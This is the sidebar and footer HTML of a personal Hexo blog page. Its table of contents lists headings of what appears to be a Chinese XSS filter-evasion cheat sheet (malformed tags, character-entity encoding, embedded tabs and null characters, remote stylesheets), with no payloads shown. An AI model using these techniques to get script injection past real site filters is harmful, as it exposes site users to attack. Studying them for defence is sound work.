class="nav-text">2.9.  重音符混淆</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-10-畸形的A标签"><span class="nav-number">2.10.</span> <span class="nav-text">2.10.    畸形的A标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-11-畸形的IMG标签"><span class="nav-number">2.11.</span> <span class="nav-text">2.11.    畸形的IMG标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-12-fromCharCode函数"><span class="nav-number">2.12.</span> <span class="nav-text">2.12.    fromCharCode函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-13-使用默认SRC属性绕过SRC域名过滤器"><span class="nav-number">2.13.</span> <span class="nav-text">2.13.    使用默认SRC属性绕过SRC域名过滤器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-14-使用默认为空的SRC属性"><span class="nav-number">2.14.</span> <span class="nav-text">2.14.    使用默认为空的SRC属性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-15-使用不含SRC属性"><span class="nav-number">2.15.</span> <span class="nav-text">2.15.    使用不含SRC属性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-16-通过error事件触发alert"><span class="nav-number">2.16.</span> <span class="nav-text">2.16.    通过error事件触发alert</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-17-对IMG标签中onerror属性进行编码"><span class="nav-number">2.17.</span> <span class="nav-text">2.17.    对IMG标签中onerror属性进行编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-18-十进制HTML字符实体编码"><span class="nav-number">2.18.</span> <span class="nav-text">2.18.    十进制HTML字符实体编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-19-不带分号的十进制HTML字符实体编码"><span class="nav-number">2.19.</span> <span class="nav-text">2.19.    不带分号的十进制HTML字符实体编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-20-不带分号的十六进制HTML字符实体编码"><span class="nav-number">2.20.</span> <span class="nav-text">2.20.    不带分号的十六进制HTML字符实体编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-21-内嵌TAB"><span class="nav-number">2.21.</span> <span class="nav-text">2.21.    内嵌TAB</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-22-内嵌编码后TAB"><span class="nav-number">2.22.</span> <span class="nav-text">2.22.    内嵌编码后TAB</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-23-内嵌换行分隔XSS攻击代码"><span class="nav-number">2.23.</span> <span class="nav-text">2.23.    内嵌换行分隔XSS攻击代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-24-内嵌回车分隔XSS攻击代码"><span class="nav-number">2.24.</span> <span class="nav-text">2.24.    内嵌回车分隔XSS攻击代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-25-使用空字符分隔JavaScript指令"><span class="nav-number">2.25.</span> <span class="nav-text">2.25.    使用空字符分隔JavaScript指令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-26-利用IMG标签中JavaScript指令前的空格和元字符"><span class="nav-number">2.26.</span> <span class="nav-text">2.26.    利用IMG标签中JavaScript指令前的空格和元字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-27-利用非字母非数字字符"><span class="nav-number">2.27.</span> <span class="nav-text">2.27.    利用非字母非数字字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-28-额外的尖括号"><span class="nav-number">2.28.</span> <span class="nav-text">2.28.    额外的尖括号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-29-未闭合的script标签"><span class="nav-number">2.29.</span> <span class="nav-text">2.29.    未闭合的script标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-30-script标签中的协议解析"><span class="nav-number">2.30.</span> <span class="nav-text">2.30.    script标签中的协议解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-31-只含左尖括号的HTML-JavaScript-XSS向量"><span class="nav-number">2.31.</span> <span class="nav-text">2.31.    只含左尖括号的HTML/JavaScript XSS向量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-32-多个左尖括号"><span class="nav-number">2.32.</span> <span class="nav-text">2.32.    多个左尖括号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-33-JavaScript双重转义"><span class="nav-number">2.33.</span> <span class="nav-text">2.33.    JavaScript双重转义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-34-闭合title标签"><span class="nav-number">2.34.</span> <span class="nav-text">2.34.    闭合title标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-35-INPUT-image"><span class="nav-number">2.35.</span> <span class="nav-text">2.35.    INPUT image</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-36-BODY-image"><span class="nav-number">2.36.</span> <span class="nav-text">2.36.    BODY image</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-37-IMG-Dynsrc"><span class="nav-number">2.37.</span> <span class="nav-text">2.37.    IMG Dynsrc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-38-IMG-lowsrc"><span class="nav-number">2.38.</span> <span class="nav-text">2.38.    IMG lowsrc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-39-List-style-image"><span class="nav-number">2.39.</span> <span class="nav-text">2.39.    List-style-image</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-40-图片中引用VBscript"><span class="nav-number">2.40.</span> <span class="nav-text">2.40.    图片中引用VBscript</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-41-Livescript-仅限旧版本Netscape"><span class="nav-number">2.41.</span> <span class="nav-text">2.41.    Livescript (仅限旧版本Netscape)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-42-SVG对象标签"><span class="nav-number">2.42.</span> <span class="nav-text">2.42.    SVG对象标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-43-ECMAScript-6"><span class="nav-number">2.43.</span> <span class="nav-text">2.43.    ECMAScript 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-44-BODY标签"><span class="nav-number">2.44.</span> <span class="nav-text">2.44.    BODY标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-45-事件处理程序"><span class="nav-number">2.45.</span> <span class="nav-text">2.45.    事件处理程序</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-46-BGSOUND"><span class="nav-number">2.46.</span> <span class="nav-text">2.46.    BGSOUND</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-47-amp-JavaScript包含"><span class="nav-number">2.47.</span> <span class="nav-text">2.47.    &amp; JavaScript包含</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-48-样式表"><span class="nav-number">2.48.</span> <span class="nav-text">2.48.    样式表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-49-远程样式表"><span class="nav-number">2.49.</span> <span class="nav-text">2.49.    远程样式表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-50-远程样式表2"><span class="nav-number">2.50.</span> <span class="nav-text">2.50.    远程样式表2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-51-远程样式表3"><span class="nav-number">2.51.</span> <span class="nav-text">2.51.    远程样式表3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-52-远程样式表4"><span class="nav-number">2.52.</span> <span class="nav-text">2.52.    远程样式表4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">2.53.</span> <span class="nav-text"></span></a></li></ol></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image"
      src="https://s2.ax1x.com/2019/10/08/ufukdI.th.jpg"
      alt="Gality">
  <p class="site-author-name" itemprop="name">Gality</p>
  <div class="site-description" itemprop="description">这里记录着我的所学所想</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
        
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span>
        
      </div>
    
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://github.com/anbious" title="GitHub &rarr; https://github.com/anbious" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
    
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="mailto:434400726@qq.com" title="E-Mail &rarr; mailto:434400726@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
    
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://aubreyii.github.io/" title="https://aubreyii.github.io/" rel="noopener" target="_blank">Aubrey</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/SSR_J_Study" title="https://blog.csdn.net/SSR_J_Study" rel="noopener" target="_blank">苏溧</a>
        </li>
      
    </ul>
  </div>
  <span>　<i class="fa fa-bomb"></i></span>
<span id="days"></span>

<script>
 function show_date_time(){
    window.setTimeout("show_date_time()", 1000);
    BirthDay=new Date("10/05/2019 15:13:14");//修改为自己的blog建站时间
    today=new Date();
    timeold=(today.getTime()-BirthDay.getTime());
    sectimeold=timeold/1000
    secondsold=Math.floor(sectimeold);
    msPerDay=24*60*60*1000
    e_daysold=timeold/msPerDay
    daysold=Math.floor(e_daysold);
    e_hrsold=(e_daysold-daysold)*24;
    hrsold=setzero(Math.floor(e_hrsold));
    e_minsold=(e_hrsold-hrsold)*60;
    minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
    seconds=setzero(Math.floor((e_minsold-minsold)*60));
    document.getElementById('days').innerHTML="本站已安全运行"+daysold+"天"+hrsold+"小时"+minsold+"分"+seconds+"秒";
}
function setzero(i){
    if (i<10)
    {i="0" + i};
    return i;
}
show_date_time();
</script>

      </div>
          <div id="days"></div>

    </div>

  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Gality</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 - <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.4.1</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
  
    <span class="post-meta-divider">|</span>
  
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
  
</div>












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.1"></script><script src="/js/motion.js?v=7.4.1"></script>
<script src="/js/schemes/pisces.js?v=7.4.1"></script>
<script src="/js/next-boot.js?v=7.4.1"></script>



  








  <script src="/js/local-search.js?v=7.4.1"></script>














  

  

  


<script>
NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail';
  guest = guest.split(',').filter(item => {
    return GUEST.includes(item);
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'aR8ng54zhg5n4NqhzHlwq6cF-gzGzoHsz',
    appKey: 'BBkWyI9GUxpC87rrDlujaHHU',
    placeholder: '留下邮箱，有回复时你将收到提醒，邮箱不会被公开',
    avatar: 'wavatar',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false,
    lang: '' || 'zh-cn',
    path: location.pathname,
    recordIP: false,
    serverURLs: ''
  });
}, window.Valine);
</script>

</body>
</html>
